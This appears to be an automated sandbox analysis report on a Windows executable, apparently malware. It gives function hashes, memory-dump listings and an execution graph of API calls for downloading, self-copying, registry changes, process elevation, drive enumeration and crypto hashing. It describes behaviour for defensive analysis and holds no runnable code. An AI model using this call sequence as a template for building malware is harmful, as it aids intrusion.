                                                                                                                            • Opcode Fuzzy Hash: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction Fuzzy Hash: 06018B35700200AFC310DF19EC42E5AB7E1AFC8705F19442EF588CB362D761EC958B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF251
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF266
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                            • String ID: TeS
                                                                                                                            • API String ID: 757275642-2115813586
                                                                                                                            • Opcode ID: e8f3159a6c9c80a27908fc3e2efeb66e616a28123fe40b021a09b476d08b9c57
                                                                                                                            • Instruction ID: 9b93e80207c89234d115c3431e76c89cfb3ebec580d4235197ab496171ba5b75
                                                                                                                            • Opcode Fuzzy Hash: e8f3159a6c9c80a27908fc3e2efeb66e616a28123fe40b021a09b476d08b9c57
                                                                                                                            • Instruction Fuzzy Hash: 6FD06774D4020DBBCF04EFA5C589CCDBFB8AA04349F40856AAE1597241EA74A3498B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:6.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:1990
                                                                                                                            Total number of Limit Nodes:171
                                                                                                                            execution_graph 38753 e53f84 38754 e53f90 _wprintf 38753->38754 38790 e62603 GetStartupInfoW 38754->38790 38757 e53f95 38792 e578d5 GetProcessHeap 38757->38792 38758 e53fed 38759 e53ff8 38758->38759 39121 e5411a 58 API calls 3 library calls 38758->39121 38793 e55141 38759->38793 38762 e53ffe 38763 e54009 __RTC_Initialize 38762->38763 39122 e5411a 58 API calls 3 library calls 38762->39122 38814 e58754 38763->38814 38766 e54018 38767 e54024 GetCommandLineW 38766->38767 39123 e5411a 58 API calls 3 library calls 38766->39123 38833 e6235f GetEnvironmentStringsW 38767->38833 38771 e54023 38771->38767 38773 e5403e 38774 e54049 38773->38774 39124 e57c2e 58 API calls 3 library calls 38773->39124 38843 e621a1 38774->38843 38778 e5405a 38857 e57c68 38778->38857 38781 e54062 38782 e5406d __wwincmdln 38781->38782 39126 e57c2e 58 API calls 3 library calls 38781->39126 38863 e49f90 38782->38863 38785 e54081 38786 e54090 38785->38786 39127 e57f3d 58 API calls _doexit 38785->39127 39128 e57c59 58 API calls _doexit 38786->39128 38789 e54095 _wprintf 38791 e62619 38790->38791 38791->38757 38792->38758 39129 e57d6c 36 API calls 2 library calls 38793->39129 38795 e55146 39130 e58c48 InitializeCriticalSectionAndSpinCount __mtinitlocks 38795->39130 38797 e5514b 38798 e5514f 38797->38798 39132 e624f7 TlsAlloc 38797->39132 39131 e551b7 61 API calls 2 library calls 38798->39131 38801 e55154 38801->38762 38802 e55161 38802->38798 38803 e5516c 38802->38803 39133 e58c96 38803->39133 38806 e551ae 39141 e551b7 61 API calls 2 library calls 38806->39141 38809 e5518d 38809->38806 38811 e55193 38809->38811 38810 e551b3 38810->38762 39140 e5508e 58 API calls 4 library calls 38811->39140 38813 e5519b GetCurrentThreadId 38813->38762 38815 e58760 _wprintf 38814->38815 39180 e58af7 38815->39180 38817 e58767 38818 e58c96 __calloc_crt 58 API calls 38817->38818 38820 e58778 38818->38820 38819 e587e3 GetStartupInfoW 38827 e587f8 38819->38827 38830 e58927 38819->38830 38820->38819 38821 e58783 _wprintf @_EH4_CallFilterFunc@8 38820->38821 38821->38766 38822 e589ef 39189 e589ff LeaveCriticalSection _doexit 38822->39189 38824 e58c96 __calloc_crt 58 API calls 38824->38827 38825 e58974 GetStdHandle 38825->38830 38826 e58987 GetFileType 38826->38830 38827->38824 38828 e58846 38827->38828 38827->38830 38829 e5887a GetFileType 38828->38829 38828->38830 39187 e6263e InitializeCriticalSectionAndSpinCount 38828->39187 38829->38828 38830->38822 38830->38825 38830->38826 39188 e6263e InitializeCriticalSectionAndSpinCount 38830->39188 38834 e54034 38833->38834 38835 e62370 38833->38835 38839 e61f64 GetModuleFileNameW 38834->38839 38836 e58cde __malloc_crt 58 API calls 38835->38836 38837 e62396 ___init_ctype 38836->38837 38838 e623ac FreeEnvironmentStringsW 38837->38838 38838->38834 38840 e61f98 _wparse_cmdline 38839->38840 38841 e58cde __malloc_crt 58 API calls 38840->38841 38842 e61fd8 _wparse_cmdline 38840->38842 38841->38842 38842->38773 38844 e5404f 38843->38844 38845 e621ba _GetLcidFromLangCountry 38843->38845 38844->38778 39125 e57c2e 58 API calls 3 library calls 38844->39125 38846 e58c96 __calloc_crt 58 API calls 38845->38846 38850 e621e3 _GetLcidFromLangCountry 38846->38850 38847 e6223a 38848 e50bed _free 58 API calls 38847->38848 38848->38844 38849 e58c96 __calloc_crt 58 API calls 38849->38850 38850->38844 38850->38847 38850->38849 38851 e6225f 38850->38851 38854 e62276 38850->38854 39249 e5962f 58 API calls 2 library calls 38850->39249 38852 e50bed _free 58 API calls 38851->38852 38852->38844 39250 e542fd IsProcessorFeaturePresent 38854->39250 38856 e62282 38859 e57c74 __IsNonwritableInCurrentImage 38857->38859 39273 e6aeb5 38859->39273 38860 e57c92 __initterm_e 38862 e57cb1 __cinit __IsNonwritableInCurrentImage 38860->38862 39276 e519ac 38860->39276 38862->38781 38864 e49fa0 __write_nolock 38863->38864 39311 e3cf10 38864->39311 38866 e49fb0 38867 e49fc4 GetCurrentProcess GetLastError SetPriorityClass 38866->38867 38868 e49fb4 38866->38868 38870 e49fe4 GetLastError 38867->38870 38871 e49fe6 38867->38871 39737 e424e0 109 API calls _memset 38868->39737 38870->38871 39325 e4d3c0 38871->39325 38872 e49fb9 38872->38785 38875 e4a022 39328 e4d340 38875->39328 38876 e4b669 39770 e7f23e 59 API calls 2 library calls 38876->39770 38878 e4b673 39771 e7f23e 59 API calls 2 library calls 38878->39771 38883 e4a065 39333 e43a90 38883->39333 38887 e4a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38889 e4a33d GlobalFree 38887->38889 38903 e4a196 38887->38903 38888 e4a100 38888->38887 38890 e4a354 38889->38890 38891 e4a45c 38889->38891 38893 e42220 76 API calls 38890->38893 39389 e42220 38891->39389 38894 e4a359 38893->38894 38896 e4a466 38894->38896 39404 e3ef50 38894->39404 38895 e4a1cc lstrcmpW lstrcmpW 38895->38903 38896->38785 38898 e4a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38898->38903 38899 e4a48f 38901 e4a4ef 38899->38901 39409 e43ea0 38899->39409 38904 e41cd0 92 API calls 38901->38904 38902 e50235 60 API calls _TranslateName 38902->38903 38903->38889 38903->38895 38903->38898 38903->38902 38905 e4a361 38903->38905 38907 e4a563 38904->38907 39349 e53c92 38905->39349 38910 e4a57e 38907->38910 38917 e4a5f5 38907->38917 38909 e4a395 OpenProcess 38911 e4a402 38909->38911 38912 e4a3a9 WaitForSingleObject CloseHandle 38909->38912 39743 e44690 38910->39743 39352 e41cd0 38911->39352 38912->38911 38916 e4a3cb 38912->38916 38913 e4a6f9 39767 e41a10 8 API calls 38913->39767 38932 e4a3d4 Sleep 38916->38932 38933 e4a3e2 GlobalFree 38916->38933 39738 e41ab0 PeekMessageW 38916->39738 38917->38913 38918 e4a6fe 38917->38918 38937 e4a5db 38917->38937 38921 e4a8b6 CreateMutexA 38918->38921 38922 e4a70f 38918->38922 38919 e4a5a9 38924 e44690 59 API calls 38919->38924 38928 e4a8ca 38921->38928 38927 e4a7dc 38922->38927 38938 e3ef50 58 API calls 38922->38938 38930 e4a5d4 38924->38930 38925 e4a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38926 e4a451 38925->38926 38926->38785 38934 e3ef50 58 API calls 38927->38934 38931 e3ef50 58 API calls 38928->38931 38929 e4a624 GetVersion 38929->38913 38935 e4a632 lstrcpyW lstrcatW lstrcatW 38929->38935 39766 e3d240 132 API calls 4 library calls 38930->39766 38945 e4a8da 38931->38945 38932->38909 38939 e4a3f7 38933->38939 38940 e4a7ec 38934->38940 38941 e4a674 _memset 38935->38941 38937->38917 38937->38921 38937->38929 38949 e4a72f 38938->38949 38939->38785 38942 e4a7f1 lstrlenA 38940->38942 38944 e4a6b4 ShellExecuteExW 38941->38944 38943 e50c62 _malloc 58 API calls 38942->38943 38946 e4a810 _memset 38943->38946 38944->38918 38947 e4a6e3 38944->38947 38948 e43ea0 59 API calls 38945->38948 38962 e4a92f 38945->38962 38951 e4a81e MultiByteToWideChar lstrcatW 38946->38951 38964 e4a9d1 38947->38964 38948->38945 38950 e43ea0 59 API calls 38949->38950 38953 e4a780 38949->38953 38950->38949 38951->38942 38952 e4a847 lstrlenW 38951->38952 38954 e4a856 38952->38954 38955 e4a8a0 CreateMutexA 38952->38955 38956 e4a792 38953->38956 38957 e4a79c CreateThread 38953->38957 39430 e3e760 38954->39430 38955->38928 38959 e43ff0 59 API calls 38956->38959 38957->38927 38961 e4a7d0 38957->38961 40906 e4dbd0 95 API calls 4 library calls 38957->40906 38959->38957 38960 e4a860 CreateThread WaitForSingleObject 38960->38955 40837 e4e690 38960->40837 38961->38927 39441 e45c10 38962->39441 38964->38785 38965 e4a98c 39454 e42840 38965->39454 38967 e4a997 39459 e40fc0 CryptAcquireContextW 38967->39459 38969 e4a9ab 38970 e4a9c2 lstrlenA 38969->38970 38970->38964 38971 e4a9d8 38970->38971 38972 e45c10 59 API calls 38971->38972 38973 e4aa23 38972->38973 38974 e42840 60 API calls 38973->38974 38975 e4aa2e lstrcpyA 38974->38975 38977 e4aa4b 38975->38977 38978 e45c10 59 API calls 38977->38978 38979 e4aa90 38978->38979 38980 e3ef50 58 API calls 38979->38980 38981 e4aaa0 38980->38981 38982 e43ea0 59 API calls 38981->38982 38983 e4aaf5 38981->38983 38982->38981 39482 e43ff0 38983->39482 38985 e4ab1d 39509 e42900 38985->39509 38987 e4ab28 _memmove 38988 e3ef50 58 API calls 38987->38988 38989 e4abc5 38988->38989 38989->38989 38990 e43ea0 59 API calls 38989->38990 38991 e4ac1e 38989->38991 38990->38989 38992 e43ff0 59 API calls 38991->38992 38993 e4ac46 38992->38993 38994 e42900 60 API calls 38993->38994 38996 e4ac51 _memmove 38994->38996 38995 e3ef50 58 API calls 38997 e4acee 38995->38997 38996->38995 38998 e43ea0 59 API calls 38997->38998 38999 e4ad43 38997->38999 38998->38997 39000 e43ff0 59 API calls 38999->39000 39001 e4ad6b 39000->39001 39002 e42900 60 API calls 39001->39002 39005 e4ad76 _memmove 39002->39005 39003 e45c10 59 API calls 39004 e4ae2a 39003->39004 39514 e43580 39004->39514 39005->39003 39007 e4ae3c 39008 e45c10 59 API calls 39007->39008 39009 e4ae76 39008->39009 39010 e43580 59 API calls 39009->39010 39011 e4ae82 39010->39011 39012 e45c10 59 API calls 39011->39012 39013 e4aebc 39012->39013 39014 e43580 59 API calls 39013->39014 39015 e4aec8 39014->39015 39016 e45c10 59 API calls 39015->39016 39017 e4af02 39016->39017 39018 e43580 59 API calls 39017->39018 39019 e4af0e 39018->39019 39020 e45c10 59 API calls 39019->39020 39021 e4af48 39020->39021 39022 e43580 59 API calls 39021->39022 39023 e4af54 39022->39023 39024 e45c10 59 API calls 39023->39024 39025 e4af8e 39024->39025 39026 e43580 59 API calls 39025->39026 39027 e4af9a 39026->39027 39028 e45c10 59 API calls 39027->39028 39029 e4afd4 39028->39029 39030 e43580 59 API calls 39029->39030 39031 e4afe0 39030->39031 39521 e43100 39031->39521 39033 e4b001 39034 e43580 59 API calls 39033->39034 39035 e4b025 39034->39035 39036 e43100 59 API calls 39035->39036 39037 e4b03c 39036->39037 39038 e43580 59 API calls 39037->39038 39039 e4b059 39038->39039 39040 e43100 59 API calls 39039->39040 39041 e4b070 39040->39041 39042 e43580 59 API calls 39041->39042 39043 e4b07c 39042->39043 39044 e43100 59 API calls 39043->39044 39045 e4b093 39044->39045 39046 e43580 59 API calls 39045->39046 39047 e4b09f 39046->39047 39048 e43100 59 API calls 39047->39048 39049 e4b0b6 39048->39049 39050 e43580 59 API calls 39049->39050 39051 e4b0c2 39050->39051 39052 e43100 59 API calls 39051->39052 39053 e4b0d9 39052->39053 39054 e43580 59 API calls 39053->39054 39055 e4b0e5 39054->39055 39056 e43100 59 API calls 39055->39056 39057 e4b0fc 39056->39057 39058 e43580 59 API calls 39057->39058 39059 e4b108 39058->39059 39061 e4b130 39059->39061 39768 e4cdd0 59 API calls 39059->39768 39062 e3ef50 58 API calls 39061->39062 39063 e4b16e 39062->39063 39065 e4b1a5 GetUserNameW 39063->39065 39528 e42de0 39063->39528 39066 e4b1c9 39065->39066 39535 e42c40 39066->39535 39068 e4b1d8 39542 e42bf0 39068->39542 39072 e4b2f5 39553 e436c0 39072->39553 39076 e4b311 39569 e430b0 39076->39569 39078 e42c40 59 API calls 39093 e4b1f3 39078->39093 39081 e42900 60 API calls 39081->39093 39082 e4b327 39595 e411c0 CreateFileW 39082->39595 39083 e43580 59 API calls 39083->39093 39085 e4b33b 39680 e4ba10 LoadCursorW RegisterClassExW 39085->39680 39087 e43100 59 API calls 39087->39093 39088 e4b343 39681 e4ba80 CreateWindowExW 39088->39681 39090 e4b34b 39090->38964 39684 e40a50 GetLogicalDrives 39090->39684 39093->39072 39093->39078 39093->39081 39093->39083 39093->39087 39769 e3f1f0 59 API calls 39093->39769 39094 e4b379 39095 e43100 59 API calls 39094->39095 39096 e4b3a5 39095->39096 39097 e43580 59 API calls 39096->39097 39120 e4b3b3 39097->39120 39098 e4b48b 39736 e4fdc0 CreateThread 39098->39736 39100 e4b49f GetMessageW 39101 e4b4ed 39100->39101 39102 e4b4bf 39100->39102 39105 e4b502 PostThreadMessageW 39101->39105 39106 e4b55b 39101->39106 39104 e4b4c5 TranslateMessage DispatchMessageW GetMessageW 39102->39104 39104->39101 39104->39104 39107 e4b510 PeekMessageW 39105->39107 39108 e4b564 PostThreadMessageW 39106->39108 39109 e4b5bb 39106->39109 39110 e4b546 WaitForSingleObject 39107->39110 39111 e4b526 DispatchMessageW PeekMessageW 39107->39111 39112 e4b570 PeekMessageW 39108->39112 39109->38964 39113 e4b5d2 CloseHandle 39109->39113 39110->39106 39110->39107 39111->39110 39111->39111 39114 e4b5a6 WaitForSingleObject 39112->39114 39115 e4b586 DispatchMessageW PeekMessageW 39112->39115 39113->38964 39114->39109 39114->39112 39115->39114 39115->39115 39120->39098 39694 e4c330 39120->39694 39700 e4c240 39120->39700 39706 e4b8b0 39120->39706 39728 e43260 39120->39728 39735 e4fa10 CreateThread 39120->39735 39121->38759 39122->38763 39123->38771 39127->38786 39128->38789 39129->38795 39130->38797 39131->38801 39132->38802 39135 e58c9d 39133->39135 39136 e55179 39135->39136 39138 e58cbb 39135->39138 39142 e6b813 39135->39142 39136->38806 39139 e62553 TlsSetValue 39136->39139 39138->39135 39138->39136 39150 e629c9 Sleep 39138->39150 39139->38809 39140->38813 39141->38810 39143 e6b81e 39142->39143 39148 e6b839 39142->39148 39144 e6b82a 39143->39144 39143->39148 39151 e55208 39144->39151 39146 e6b849 RtlAllocateHeap 39147 e6b82f 39146->39147 39146->39148 39147->39135 39148->39146 39148->39147 39154 e5793d DecodePointer 39148->39154 39150->39138 39155 e5501f GetLastError 39151->39155 39153 e5520d 39153->39147 39154->39148 39169 e62534 39155->39169 39157 e55082 SetLastError 39157->39153 39158 e55034 39158->39157 39159 e58c96 __calloc_crt 55 API calls 39158->39159 39160 e55047 39159->39160 39160->39157 39172 e62553 TlsSetValue 39160->39172 39162 e5505b 39163 e55061 39162->39163 39164 e55079 39162->39164 39173 e5508e 58 API calls 4 library calls 39163->39173 39174 e50bed 39164->39174 39167 e55069 GetCurrentThreadId 39167->39157 39168 e5507f 39168->39157 39170 e62547 39169->39170 39171 e6254b TlsGetValue 39169->39171 39170->39158 39171->39158 39172->39162 39173->39167 39175 e50bf6 HeapFree 39174->39175 39176 e50c1f _free 39174->39176 39175->39176 39177 e50c0b 39175->39177 39176->39168 39178 e55208 __flsbuf 56 API calls 39177->39178 39179 e50c11 GetLastError 39178->39179 39179->39176 39181 e58b08 39180->39181 39182 e58b1b EnterCriticalSection 39180->39182 39190 e58b9f 39181->39190 39182->38817 39184 e58b0e 39184->39182 39214 e57c2e 58 API calls 3 library calls 39184->39214 39187->38828 39188->38830 39189->38821 39191 e58bab _wprintf 39190->39191 39192 e58bb4 39191->39192 39193 e58bcc 39191->39193 39215 e57f51 58 API calls 2 library calls 39192->39215 39201 e58bed _wprintf 39193->39201 39218 e58cde 39193->39218 39196 e58bb9 39216 e57fae 58 API calls 9 library calls 39196->39216 39199 e58bf7 39205 e58af7 __lock 58 API calls 39199->39205 39200 e58be8 39204 e55208 __flsbuf 58 API calls 39200->39204 39201->39184 39202 e58bc0 39217 e57b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39202->39217 39204->39201 39207 e58bfe 39205->39207 39208 e58c23 39207->39208 39209 e58c0b 39207->39209 39210 e50bed _free 58 API calls 39208->39210 39224 e6263e InitializeCriticalSectionAndSpinCount 39209->39224 39212 e58c17 39210->39212 39225 e58c3f LeaveCriticalSection _doexit 39212->39225 39215->39196 39216->39202 39221 e58cec 39218->39221 39220 e58be1 39220->39199 39220->39200 39221->39220 39223 e58cff 39221->39223 39226 e50c62 39221->39226 39223->39220 39223->39221 39243 e629c9 Sleep 39223->39243 39224->39212 39225->39201 39227 e50cdd 39226->39227 39239 e50c6e 39226->39239 39248 e5793d DecodePointer 39227->39248 39229 e50ce3 39230 e55208 __flsbuf 57 API calls 39229->39230 39242 e50cd5 39230->39242 39232 e50ca1 RtlAllocateHeap 39232->39239 39232->39242 39234 e50cc9 39237 e55208 __flsbuf 57 API calls 39234->39237 39240 e50cc7 39237->39240 39238 e50c79 39238->39239 39244 e57f51 58 API calls 2 library calls 39238->39244 39245 e57fae 58 API calls 9 library calls 39238->39245 39246 e57b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39238->39246 39239->39232 39239->39234 39239->39238 39239->39240 39247 e5793d DecodePointer 39239->39247 39241 e55208 __flsbuf 57 API calls 39240->39241 39241->39242 39242->39221 39243->39223 39244->39238 39245->39238 39247->39239 39248->39229 39249->38850 39251 e54308 39250->39251 39256 e54168 39251->39256 39255 e54323 39255->38856 39257 e54182 _memset ___raise_securityfailure 39256->39257 39258 e541a2 IsDebuggerPresent 39257->39258 39264 e629ec SetUnhandledExceptionFilter UnhandledExceptionFilter 39258->39264 39261 e54266 ___raise_securityfailure 39265 e5a77e 39261->39265 39262 e54289 39263 e629d7 GetCurrentProcess TerminateProcess 39262->39263 39263->39255 39264->39261 39266 e5a786 39265->39266 39267 e5a788 IsProcessorFeaturePresent 39265->39267 39266->39262 39269 e5ab9c 39267->39269 39272 e5ab4b 5 API calls ___raise_securityfailure 39269->39272 39271 e5ac7f 39271->39262 39272->39271 39274 e6aeb8 EncodePointer 39273->39274 39274->39274 39275 e6aed2 39274->39275 39275->38860 39279 e518b0 39276->39279 39278 e519b7 39278->38862 39280 e518bc _wprintf 39279->39280 39287 e57dfc 39280->39287 39286 e518e3 _wprintf 39286->39278 39288 e58af7 __lock 58 API calls 39287->39288 39289 e518c5 39288->39289 39290 e518f4 DecodePointer DecodePointer 39289->39290 39291 e51921 39290->39291 39292 e518d1 39290->39292 39291->39292 39304 e5a78d 59 API calls 2 library calls 39291->39304 39301 e518ee 39292->39301 39294 e51984 EncodePointer EncodePointer 39294->39292 39295 e51933 39295->39294 39296 e51958 39295->39296 39305 e58d25 61 API calls 2 library calls 39295->39305 39296->39292 39299 e51972 EncodePointer 39296->39299 39306 e58d25 61 API calls 2 library calls 39296->39306 39299->39294 39300 e5196c 39300->39292 39300->39299 39307 e57e05 39301->39307 39304->39295 39305->39296 39306->39300 39310 e58c81 LeaveCriticalSection 39307->39310 39309 e518f3 39309->39286 39310->39309 39312 e3cf32 _memset __write_nolock 39311->39312 39313 e3cf4f InternetOpenW 39312->39313 39314 e45c10 59 API calls 39313->39314 39315 e3cf8a InternetOpenUrlW 39314->39315 39316 e3cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39315->39316 39324 e3cfb2 39315->39324 39772 e456d0 39316->39772 39318 e3d000 39319 e456d0 59 API calls 39318->39319 39320 e3d049 39319->39320 39320->39324 39791 e43010 59 API calls 39320->39791 39322 e3d084 39322->39324 39792 e43010 59 API calls 39322->39792 39324->38866 39795 e4ccc0 39325->39795 39815 e4cc50 39328->39815 39331 e4a04d 39331->38878 39331->38883 39334 e43ab2 39333->39334 39335 e43ad0 GetModuleFileNameW PathRemoveFileSpecW 39333->39335 39336 e43b00 39334->39336 39337 e43aba 39334->39337 39343 e48400 39335->39343 39823 e7f23e 59 API calls 2 library calls 39336->39823 39338 e53b4c 59 API calls 39337->39338 39340 e43ac7 39338->39340 39340->39335 39824 e7f1bb 59 API calls 3 library calls 39340->39824 39344 e48437 39343->39344 39348 e48446 39343->39348 39344->39348 39825 e45d50 59 API calls ___init_ctype 39344->39825 39346 e484b9 39346->38888 39348->39346 39826 e48d50 59 API calls 39348->39826 39827 e61781 39349->39827 39843 e5f7c0 39352->39843 39355 e41e6a 39355->38925 39356 e41d20 _memset 39357 e41d40 RegQueryValueExW RegCloseKey 39356->39357 39358 e41d8f 39357->39358 39359 e45c10 59 API calls 39358->39359 39360 e41dbf 39359->39360 39361 e41dd1 lstrlenA 39360->39361 39362 e41e7c 39360->39362 39845 e43520 39361->39845 39364 e41e94 6 API calls 39362->39364 39365 e41e89 39362->39365 39366 e41ef5 UuidCreate UuidToStringW 39364->39366 39365->39364 39368 e41f36 39366->39368 39367 e41e3c PathFileExistsW 39367->39362 39369 e41e52 39367->39369 39368->39368 39371 e45c10 59 API calls 39368->39371 39369->39355 39373 e44690 59 API calls 39369->39373 39370 e41df1 39370->39367 39372 e41f59 RpcStringFreeW PathAppendW CreateDirectoryW 39371->39372 39374 e41f98 39372->39374 39376 e41fce 39372->39376 39373->39355 39375 e45c10 59 API calls 39374->39375 39375->39376 39377 e45c10 59 API calls 39376->39377 39378 e4201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39377->39378 39379 e4207c _memset 39378->39379 39380 e421d1 39378->39380 39381 e42095 6 API calls 39379->39381 39380->39355 39382 e42115 _memset 39381->39382 39383 e42109 39381->39383 39385 e42125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39382->39385 39384 e43260 59 API calls 39383->39384 39384->39382 39386 e421b2 39385->39386 39387 e421aa GetLastError 39385->39387 39388 e421c0 WaitForSingleObject 39386->39388 39387->39380 39388->39380 39388->39388 39390 e5f7c0 __write_nolock 39389->39390 39391 e4222d 7 API calls 39390->39391 39392 e4228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39391->39392 39393 e422bd K32EnumProcesses 39391->39393 39392->39393 39394 e422d3 39393->39394 39395 e422df 39393->39395 39394->38894 39396 e42353 39395->39396 39397 e422f0 OpenProcess 39395->39397 39396->38894 39398 e42346 CloseHandle 39397->39398 39399 e4230a K32EnumProcessModules 39397->39399 39398->39396 39398->39397 39399->39398 39400 e4231c K32GetModuleBaseNameW 39399->39400 39848 e50235 39400->39848 39402 e4233e 39402->39398 39403 e42345 39402->39403 39403->39398 39405 e50c62 _malloc 58 API calls 39404->39405 39408 e3ef6e _memset 39405->39408 39406 e3efdc 39406->38899 39407 e50c62 _malloc 58 API calls 39407->39408 39408->39406 39408->39407 39410 e43f05 39409->39410 39415 e43eae 39409->39415 39411 e43fb1 39410->39411 39412 e43f18 39410->39412 39863 e7f23e 59 API calls 2 library calls 39411->39863 39414 e43fbb 39412->39414 39416 e43f2d 39412->39416 39419 e43f3d ___init_ctype 39412->39419 39864 e7f23e 59 API calls 2 library calls 39414->39864 39415->39410 39422 e43ed4 39415->39422 39416->39419 39862 e46760 59 API calls 2 library calls 39416->39862 39419->38899 39424 e43eef 39422->39424 39425 e43ed9 39422->39425 39861 e43da0 59 API calls ___init_ctype 39424->39861 39860 e43da0 59 API calls ___init_ctype 39425->39860 39428 e43eff 39428->38899 39429 e43ee9 39429->38899 39865 e3e670 39430->39865 39432 e3e79e 39433 e43ea0 59 API calls 39432->39433 39434 e3e7c3 39433->39434 39435 e43ff0 59 API calls 39434->39435 39436 e3e7ff 39435->39436 39891 e3e870 39436->39891 39438 e3e806 39439 e43ff0 59 API calls 39438->39439 39440 e3e80d 39438->39440 39439->39440 39440->38960 39442 e45c66 39441->39442 39448 e45c1e 39441->39448 39443 e45c76 39442->39443 39444 e45cff 39442->39444 39452 e45c88 ___init_ctype 39443->39452 40151 e46950 59 API calls 2 library calls 39443->40151 40152 e7f23e 59 API calls 2 library calls 39444->40152 39448->39442 39453 e44690 59 API calls 39448->39453 39452->38965 39453->39442 40153 e43c40 39454->40153 39456 e4288c WideCharToMultiByte 40163 e484e0 39456->40163 39458 e428cf 39458->38967 39460 e4101a 39459->39460 39461 e4102b CryptCreateHash 39459->39461 40174 e60eca RaiseException 39460->40174 39463 e41045 39461->39463 39464 e41056 lstrlenA CryptHashData 39461->39464 40175 e60eca RaiseException 39463->40175 39466 e4106e 39464->39466 39467 e4107f CryptGetHashParam 39464->39467 40176 e60eca RaiseException 39466->40176 39469 e4109f 39467->39469 39471 e410b0 _memset 39467->39471 40177 e60eca RaiseException 39469->40177 39472 e410cf CryptGetHashParam 39471->39472 39473 e410e4 39472->39473 39474 e410f5 39472->39474 40178 e60eca RaiseException 39473->40178 39476 e50c62 _malloc 58 API calls 39474->39476 39477 e41105 _memset 39476->39477 39478 e41148 39477->39478 39479 e504a6 _sprintf 83 API calls 39477->39479 39480 e4114e CryptDestroyHash CryptReleaseContext 39478->39480 39481 e41133 lstrcatA 39479->39481 39480->38969 39481->39477 39481->39478 39483 e440f2 39482->39483 39484 e44009 39482->39484 40182 e7f26c 59 API calls 3 library calls 39483->40182 39486 e44016 39484->39486 39487 e4405d 39484->39487 39488 e440fc 39486->39488 39489 e44022 39486->39489 39490 e44106 39487->39490 39491 e44066 39487->39491 40183 e7f26c 59 API calls 3 library calls 39488->40183 39493 e44044 39489->39493 39494 e4402b 39489->39494 40184 e7f23e 59 API calls 2 library calls 39490->40184 39505 e44078 ___init_ctype 39491->39505 40181 e46760 59 API calls 2 library calls 39491->40181 40180 e42e80 59 API calls _memmove 39493->40180 40179 e42e80 59 API calls _memmove 39494->40179 39500 e4403b 39500->38985 39503 e44054 39503->38985 39505->38985 39510 e43a90 59 API calls 39509->39510 39511 e4294c MultiByteToWideChar 39510->39511 39512 e48400 59 API calls 39511->39512 39513 e4298d 39512->39513 39513->38987 39515 e435d6 39514->39515 39516 e43591 39514->39516 39520 e435b7 39515->39520 40186 e44f70 59 API calls 39515->40186 39516->39515 39517 e43597 39516->39517 39517->39520 40185 e44f70 59 API calls 39517->40185 39520->39007 39522 e43121 39521->39522 39523 e43133 39521->39523 39524 e45c10 59 API calls 39522->39524 39526 e45c10 59 API calls 39523->39526 39525 e4312c 39524->39525 39525->39033 39527 e43159 39526->39527 39527->39033 39529 e42dec 39528->39529 39530 e42dfa 39528->39530 39531 e43ea0 59 API calls 39529->39531 39533 e43ea0 59 API calls 39530->39533 39532 e42df5 39531->39532 39532->39063 39534 e42e11 39533->39534 39534->39063 39536 e42c71 39535->39536 39537 e42c5f 39535->39537 39540 e456d0 59 API calls 39536->39540 39538 e456d0 59 API calls 39537->39538 39539 e42c6a 39538->39539 39539->39068 39541 e42c8a 39540->39541 39541->39068 39543 e43ff0 59 API calls 39542->39543 39544 e42c13 39543->39544 39545 e3ecb0 39544->39545 39547 e3ece5 39545->39547 39548 e3eefc 39547->39548 40187 e51b3b 59 API calls 3 library calls 39547->40187 39548->39093 39549 e3ed6b _memmove 39549->39548 39550 e456d0 59 API calls 39549->39550 39551 e45230 59 API calls 